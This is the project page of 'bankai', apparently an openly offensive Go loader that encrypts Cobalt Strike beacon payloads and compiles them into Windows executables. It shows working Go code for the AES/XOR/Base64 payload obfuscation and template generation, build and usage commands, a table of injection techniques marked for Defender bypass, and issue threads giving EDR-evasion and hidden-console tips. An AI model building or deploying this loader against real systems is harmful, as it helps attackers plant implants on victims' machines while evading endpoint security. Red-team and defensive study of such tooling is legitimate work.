Another Go shellcode loader designed to work with Cobalt Strike raw binary payload.

Bankai

Another Go shellcode loader designed to work with Cobalt Strike raw binary payloads. I created this project mainly to educate myself while learning Go and directly executing shellcode on a target Windows system using various techniques.

Encryption - I implemented a simple payload encryption process (IV --> AES --> XOR --> Base64) that I learned while studying for SLAE32. This is mainly for protecting the Cobalt Strike payload while it is moved to the target host. The final compiled payload includes a decrypt function, so the key material ships inside the binary: the scheme hides the raw beacon from static signatures and casual inspection in transit, not from someone who reverses the loader itself.
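
The README only gives the order of the stages (IV --> AES --> XOR --> Base64), not the AES mode, padding or XOR width. The following is an added example written for this page, not bankai's own code, showing one concrete instance of that pipeline in Go so the round trip can be checked offline. Assumptions: AES-256 in CBC mode with PKCS#7 padding, a 16-byte random IV prepended to the ciphertext, a single-byte XOR key, and standard Base64. The sample bytes are a constructed stand-in for a beacon, not real shellcode.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
)

// pkcs7Pad returns a padded copy of data (always adds 1..blockSize bytes).
func pkcs7Pad(data []byte, blockSize int) []byte {
	n := blockSize - len(data)%blockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad validates and strips the padding; a wrong key or a corrupted
// blob is reported as an error instead of being executed as garbage.
func pkcs7Unpad(data []byte, blockSize int) ([]byte, error) {
	if len(data) == 0 || len(data)%blockSize != 0 {
		return nil, errors.New("invalid padded length")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > blockSize {
		return nil, errors.New("invalid padding byte")
	}
	for _, b := range data[len(data)-n:] {
		if int(b) != n {
			return nil, errors.New("invalid padding")
		}
	}
	return data[:len(data)-n], nil
}

// xorBytes applies a single-byte XOR key (assumed width); XOR is its own inverse.
func xorBytes(data []byte, key byte) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key
	}
	return out
}

// encryptWithIV runs the pipeline with a caller-supplied IV (deterministic, for tests).
func encryptWithIV(shellcode, aesKey, iv []byte, xorKey byte) (string, error) {
	if len(iv) != aes.BlockSize {
		return "", errors.New("iv must be 16 bytes")
	}
	block, err := aes.NewCipher(aesKey) // 16/24/32-byte key selects AES-128/192/256
	if err != nil {
		return "", err
	}
	padded := pkcs7Pad(shellcode, aes.BlockSize)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	blob := append(append([]byte{}, iv...), ct...) // IV first so the stub can recover it
	return base64.StdEncoding.EncodeToString(xorBytes(blob, xorKey)), nil
}

// Encrypt is the generator side: random IV -> AES-CBC -> XOR -> Base64.
func Encrypt(shellcode, aesKey []byte, xorKey byte) (string, error) {
	iv := make([]byte, aes.BlockSize)
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return "", err
	}
	return encryptWithIV(shellcode, aesKey, iv, xorKey)
}

// Decrypt is what the compiled loader has to do at run time, in reverse order.
func Decrypt(blob string, aesKey []byte, xorKey byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil {
		return nil, err
	}
	raw = xorBytes(raw, xorKey)
	if len(raw) < aes.BlockSize || (len(raw)-aes.BlockSize)%aes.BlockSize != 0 {
		return nil, errors.New("blob too short or not block aligned")
	}
	block, err := aes.NewCipher(aesKey)
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt, aes.BlockSize)
}

func main() {
	// Constructed sample bytes, not a real beacon.
	shellcode := []byte{0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00}
	key := []byte("0123456789abcdef0123456789abcdef") // 32 bytes -> AES-256 (assumed)
	blob, err := Encrypt(shellcode, key, 0x5a)
	if err != nil {
		panic(err)
	}
	fmt.Println("blob:", blob)
	back, err := Decrypt(blob, key, 0x5a)
	if err != nil {
		panic(err)
	}
	fmt.Println("round trip ok:", bytes.Equal(back, shellcode))
}
```

Note that everything Decrypt needs (AES key, XOR key, and the IV inside the blob) is present in the generated binary, which is why this protects the payload on the wire and on disk, not against analysis of the loader.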

Templates - Templates are the skeleton Go source files from which the final payload is generated, one per technique: the selected template is rendered (to output/shellcode.go) with the encrypted payload and key embedded, then compiled with go build.
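
As an added example (not bankai's own template or generator code), the block below renders a constructed skeleton with text/template and then parses the generated source with go/parser before handing it to go build. The field names (Key, XORKey, Blob) and the skeleton itself are assumptions for this example; the skeleton only does the Base64/XOR part of the decode so it stays platform-independent, while the real templates also allocate memory and start the thread on Windows. The syntax check is the kind of guard that would have caught a skeleton with a missing closing brace at generation time.

```go
package main

import (
	"bytes"
	"fmt"
	"go/parser"
	"go/token"
	"text/template"
)

// LoaderParams holds the values substituted into a technique skeleton.
// Field names are assumptions for this example, not bankai's template variables.
type LoaderParams struct {
	Key    string // AES key as it will be embedded in the loader
	XORKey byte
	Blob   string // Base64 of the encrypted shellcode
}

// skeleton is a constructed stand-in for a *.tmpl file. The generated program
// recovers the XORed bytes; AES decryption and execution are left out on purpose.
const skeleton = `package main

import (
	"encoding/base64"
	"fmt"
)

var key = []byte({{printf "%q" .Key}})
var xorKey byte = {{.XORKey}}
var blob = {{printf "%q" .Blob}}

func main() {
	raw, err := base64.StdEncoding.DecodeString(blob)
	if err != nil {
		panic(err)
	}
	for i := range raw {
		raw[i] ^= xorKey
	}
	fmt.Println(len(raw), "bytes recovered; AES-CBC decrypt with key would follow")
}
`

// Render fills tmpl with p and returns the generated Go source.
func Render(tmpl string, p LoaderParams) (string, error) {
	t, err := template.New("loader").Parse(tmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, p); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// CheckSyntax parses the generated source so an unbalanced brace in a
// skeleton is reported by the generator rather than by a later go build.
func CheckSyntax(src string) error {
	fset := token.NewFileSet()
	_, err := parser.ParseFile(fset, "shellcode.go", src, parser.AllErrors)
	return err
}

func main() {
	p := LoaderParams{Key: "0123456789abcdef0123456789abcdef", XORKey: 0x5a, Blob: "AAAA"}
	src, err := Render(skeleton, p)
	if err != nil {
		panic(err)
	}
	if err := CheckSyntax(src); err != nil {
		panic(err)
	}
	fmt.Println(src)
	// Dropping the final "}\n" simulates a skeleton with a missing closing brace.
	broken, _ := Render(skeleton[:len(skeleton)-2], p)
	fmt.Println("broken skeleton:", CheckSyntax(broken))
}
```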

Installation

git clone https://github.com/bigb0sss/bankai.git
GO111MODULE=off go build bankai.go

Usage & Example

Export a raw Cobalt Strike payload (e.g., beacon.bin) from the team server, then run bankai against it:

./bankai -h                       

     _                 _         _ 
    | |               | |       (_)
    | |__   __ _ _ __ | | ____ _ _ 
    | '_ \ / _' | '_ \| |/ / _' | |
    | |_) | (_| | | | |   < (_| | |
    |_.__/ \__,_|_| |_|_|\_\__,_|_|
                        [bigb0ss]

    [INFO] Another Go Shellcode Loader

 
    Required:
    -i            Binary File (e.g., beacon.bin)
    -o            Payload Output (e.g, payload.exe)
    -t            Payload Template (e.g., win32_VirtualProtect.tmpl)
    -a            Arch (32|64)
    
    Optional:
    -h            Print this help menu
    -p            PID

    Templates:                                        Last update: 06/07/21
    +--------------------------------------+-----------+------------------+
    | Techniques                           | PID       | Bypass Defender  |
    +--------------------------------------+-----------+------------------+
    | win32_VirtualProtect.tmpl            |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateFiber.tmpl               |           |        No        |
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThreadNative.tmpl  | Required  |        Yes       | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThread.tmpl              |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EtwpCreateEtwThread.tmpl       |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_Syscall.tmpl                   |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadpoolWait.tmpl      |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumerateLoadedModules.tmpl    |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_EnumChildWindows.tmpl          |           |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateRemoteThread.tmpl        | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_RtlCreateUserThread.tmpl       | Required  |        No        | 
    +--------------------------------------+-----------+------------------+
    | win64_CreateThreadNative.tmpl        |           |        No        | 
    +--------------------------------------+-----------+------------------+

    Example:

    ./bankai -i beacon.bin -o payload.exe -t win64_CreateThread.tmpl -a 64
    [INFO] Key: SymE9GQBtyHL4IAq5Pm6r3b8I7PJB9l0
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateThread.tmpl
    [INFO] InputFile: beacon.bin
    [INFO] OutputFile: payload.exe

    ./bankai -i beacon64.bin -o payload.exe -t win64_CreateRemoteThread.tmpl -a 64 -p 7720
    [INFO] Key: 3mOL2Ne5XIW4xCieiR7cPmHtw4o737Do
    [INFO] AES encrpyting the payload...
    [INFO] Arch: x64 (64-bit)
    [INFO] Template: win64_CreateRemoteThread.tmpl
    [INFO] InputFile: beacon64.bin
    [INFO] OutputFile: payload.exe

Credits / Acknowledgments / References

All of this work is inspired by and builds on the following researchers/projects:

Todo

  • Add more shellcode injection technique templates
  • Add AlternativeShellcodeExec techniques that Ali and Alfaro found
  • Test these shellcodes with modified malleableC2 profiles

Change Log

06/02/21
  • Added win64_CreateThreadpoolWait.tmpl
  • Added win64_EnumerateLoadedModules.tmpl
  • Added win64_EnumChildWindows.tmpl
  • Updated some error handling
06/07/21
  • Added win64_EnumPageFilesW.tmpl
  • Added win64_CreateRemoteThread.tmpl
  • Added win64_RtlCreateUserThread.tmpl
  • Added win64_CreateThreadNative.tmpl
Issues
  • Bug Fix: Line 131 is missing }

    According to the deployment tutorial you provided, an error occurred (screenshot attached). After debugging, I found that the loop at line 128 was missing a }, so I added a } on line 131.

    opened by HexChristmas 0
  • [Feature Enhancement] BananaPhone

    This is worth adding as a template mate:

    https://github.com/C-Sto/BananaPhone

    "It's a go variant of Hells gate! (directly calling windows kernel functions, but from Go!)" It will help with evading EDR.

    opened by Simon-Davies 1
  • [Bug] Console window visible

    You can fix this by adding a compiler flag. See updated code below:

    	cmd := exec.Command(
    		"go",
    		"build",
    		// The go tool keeps only the last -ldflags value it sees, so all linker
    		// flags have to go in one argument:
    		//   -s             strip the symbol table
    		//   -w             omit DWARF debug information
    		//   -H=windowsgui  link as a GUI-subsystem binary so no console window appears
    		"-ldflags=-s -w -H=windowsgui",
    		"-o", outputFile,
    		"output/shellcode.go",
    	)
    
    opened by Simon-Davies 1
  • [Bug] -p flag broken if statement

    You can fix the if statement with the below:

    	// Remote-injection templates need a target process; reject them without -p.
    	if (opt.templates == "win64_CreateRemoteThreadNative.tmpl" ||
    		opt.templates == "win64_CreateRemoteThread.tmpl" ||
    		opt.templates == "win64_RtlCreateUserThread.tmpl") && opt.pid == 0 {
    		fmt.Println("[ERROR] For this template, you must use PID (-p).")
    		os.Exit(1)
    	}
    
    opened by Simon-Davies 0
Owner
bigb0ss
OSWE | OSCE | OSCP | Offensive Security Consultant Pentesting, RedTeam, ExpDev, Application Security